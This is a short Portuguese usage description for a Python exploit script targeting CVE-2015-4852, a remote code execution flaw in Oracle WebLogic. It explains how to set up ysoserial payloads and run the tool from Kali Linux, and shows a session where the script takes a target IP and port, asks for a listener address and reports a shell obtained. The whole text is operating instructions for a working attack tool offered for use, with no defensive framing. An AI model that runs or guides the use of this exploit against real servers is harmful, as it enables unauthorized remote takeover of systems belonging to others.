
Script de exploit em Python para CVE-2015-4852 (WebLogic RCE) usando payloads ysoserial para obter acesso remoto a shell em servidores WebLogic vulneráveis.
Pré-requisito: colocar o ysoserial.jar no diretório do script (renomear ysoserial-0*.jar para ysoserial.jar). Recomenda-se usar Kali Linux para executar o script.
root@kali:~# python3 CVE-2015-4852.py -h
Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001
Options:
-h, --help mostra esta mensagem de ajuda e sai
-t TARGET, --target=TARGET ip porta
root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001
Digite o IP de escuta: 10.6.214.1
Digite a porta de escuta: 7777
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Executado com sucesso
Shell obtido